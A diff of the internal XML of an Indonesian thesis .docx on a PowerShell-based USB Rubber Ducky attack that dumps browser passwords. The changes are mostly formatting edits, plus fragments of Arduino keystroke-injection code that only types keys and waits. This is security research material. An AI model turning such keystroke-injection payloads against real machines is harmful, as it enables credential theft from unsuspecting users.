       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36A775AC"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="37D66FA0"/>
@@ -33208,7 +39572,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3A1C13EF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B2D41B38"/>
@@ -33352,7 +39716,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="406E75B3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C2A26ECE"/>
@@ -33475,7 +39839,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="41910E76"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="277C4A0E"/>
@@ -33632,7 +39996,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="46F15F32"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="877298E2"/>
@@ -33718,7 +40082,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="49994841"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FDCE76D2"/>
@@ -33809,7 +40173,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="49A90E03"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2E08738A"/>
@@ -33925,7 +40289,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="513F16FE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4D7CDBD0"/>
@@ -34016,7 +40380,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5B547F24"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="49C800CE"/>
@@ -34129,7 +40493,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5F61594C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="27A8CA42"/>
@@ -34220,7 +40584,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="604C0EEC"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3C5A9C9E"/>
@@ -34311,7 +40675,98 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="65361DE4"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9EA0DA72"/>
+    <w:lvl w:ilvl="0" w:tplc="4BAC776C">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="V.1.%1"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1446" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="3809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="3809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="688B6664"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="15188FD8"/>
@@ -34428,7 +40883,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6AA75071"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="71F6547E"/>
@@ -34514,7 +40969,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6E417993"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F112FF56"/>
@@ -34600,7 +41055,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6F1418E1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6CE4BE60"/>
@@ -34689,7 +41144,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7BDF5EC2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="DDB6527E"/>
@@ -34809,37 +41264,37 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="27"/>
+    <w:abstractNumId w:val="31"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="6">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="8">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="12">
     <w:abstractNumId w:val="0"/>
@@ -34872,52 +41327,52 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="14">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="15">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="30"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="18">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="19">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="20">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="21">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="22">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="23">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="24">
+    <w:abstractNumId w:val="22"/>
+  </w:num>
+  <w:num w:numId="25">
     <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="23">
-    <w:abstractNumId w:val="9"/>
-  </w:num>
-  <w:num w:numId="24">
-    <w:abstractNumId w:val="19"/>
-  </w:num>
-  <w:num w:numId="25">
-    <w:abstractNumId w:val="7"/>
-  </w:num>
   <w:num w:numId="26">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="27">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="28">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="11"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -34947,16 +41402,58 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="29">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="30">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="31">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="32">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="33">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="34">
+    <w:abstractNumId w:val="26"/>
+  </w:num>
+  <w:num w:numId="35">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="36">
+    <w:abstractNumId w:val="11"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="37">
+    <w:abstractNumId w:val="12"/>
   </w:num>
 </w:numbering>
 </file>
@@ -36887,7 +43384,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BF7A1726-D49B-4C22-86F3-FD3FD0CC5559}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E9A02FCD-9F58-4A0F-83A3-BE96503A931D}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/TA2_Abdul Azies Muslim_IMPLEMENTASI DAN ANALISIS KELEMAHAN PADA BROWSER DENGAN MENGGUNAKAN SERANGAN USB RUBBER DUCKY BERBASIS POWERSHELL.docx
+++ b/TA2_Abdul Azies Muslim_IMPLEMENTASI DAN ANALISIS KELEMAHAN PADA BROWSER DENGAN MENGGUNAKAN SERANGAN USB RUBBER DUCKY BERBASIS POWERSHELL.docx
@@ -521,8 +521,8 @@
       </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_Toc405949670"/>
       <w:bookmarkStart w:id="1" w:name="_Toc463344411"/>
-      <w:bookmarkStart w:id="2" w:name="_Toc75146097"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc43087387"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc43087387"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc75146097"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -532,7 +532,7 @@
       </w:r>
       <w:bookmarkEnd w:id="0"/>
       <w:bookmarkEnd w:id="1"/>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -854,7 +854,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>14 June 2020</w:t>
+        <w:t>16 June 2020</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -978,15 +978,7 @@
                               <w:jc w:val="center"/>
                             </w:pPr>
                             <w:r>
-                              <w:t xml:space="preserve">Ahmad Almaarif, </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:t>S.Kom</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:t>., M.T.</w:t>
+                              <w:t>Ahmad Almaarif, S.Kom., M.T.</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -1060,15 +1052,7 @@
                         <w:jc w:val="center"/>
                       </w:pPr>
                       <w:r>
-                        <w:t xml:space="preserve">Ahmad Almaarif, </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:t>S.Kom</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:t>., M.T.</w:t>
+                        <w:t>Ahmad Almaarif, S.Kom., M.T.</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -2048,7 +2032,7 @@
           <w:noProof/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>14 Juni 2020</w:t>
+        <w:t>16 Juni 2020</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2854,15 +2838,7 @@
         <w:t>dump password</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> and run a Powershell script using </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> and run a Powershell script using a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2952,7 +2928,7 @@
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11850,15 +11826,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Sistematika penulisan penelitian ini adalah sebagai </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>berikut :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Sistematika penulisan penelitian ini adalah sebagai berikut : </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14681,13 +14649,8 @@
         <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Contoh :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> SHIFT DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW, TAB.</w:t>
+      <w:r>
+        <w:t>Contoh : SHIFT DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW, TAB.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14722,15 +14685,7 @@
         <w:t>omput</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> operasi windows. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Contoh :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> CONTROL/CTRL BREAK, PAUSE, F1</w:t>
+        <w:t xml:space="preserve"> operasi windows. Contoh : CONTROL/CTRL BREAK, PAUSE, F1</w:t>
       </w:r>
       <w:r>
         <w:t>…</w:t>
@@ -14772,13 +14727,8 @@
         <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Contoh :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ALT END, ESC, ESCAPE, F1</w:t>
+      <w:r>
+        <w:t>Contoh : ALT END, ESC, ESCAPE, F1</w:t>
       </w:r>
       <w:r>
         <w:t>…</w:t>
@@ -15565,7 +15515,7 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1154" type="#_x0000_t75" style="width:191.3pt;height:635.1pt">
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:191.3pt;height:635.1pt">
             <v:imagedata r:id="rId14" o:title="Sistematika Penelitian"/>
           </v:shape>
         </w:pict>
@@ -18501,13 +18451,7 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> dari awal hingga akhir</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> dari awal hingga akhir </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19831,25 +19775,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">void </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>int key) {</w:t>
+                              <w:t>void typeKey(int key) {</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -19883,25 +19809,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>50);</w:t>
+                              <w:t xml:space="preserve">  delay(50);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -19961,25 +19869,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">void </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>setup(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>) {</w:t>
+                              <w:t>void setup() {</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20056,25 +19946,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>400);</w:t>
+                              <w:t xml:space="preserve">  delay(400);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20159,25 +20031,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20211,25 +20065,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20246,25 +20082,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20298,25 +20116,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20333,25 +20133,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
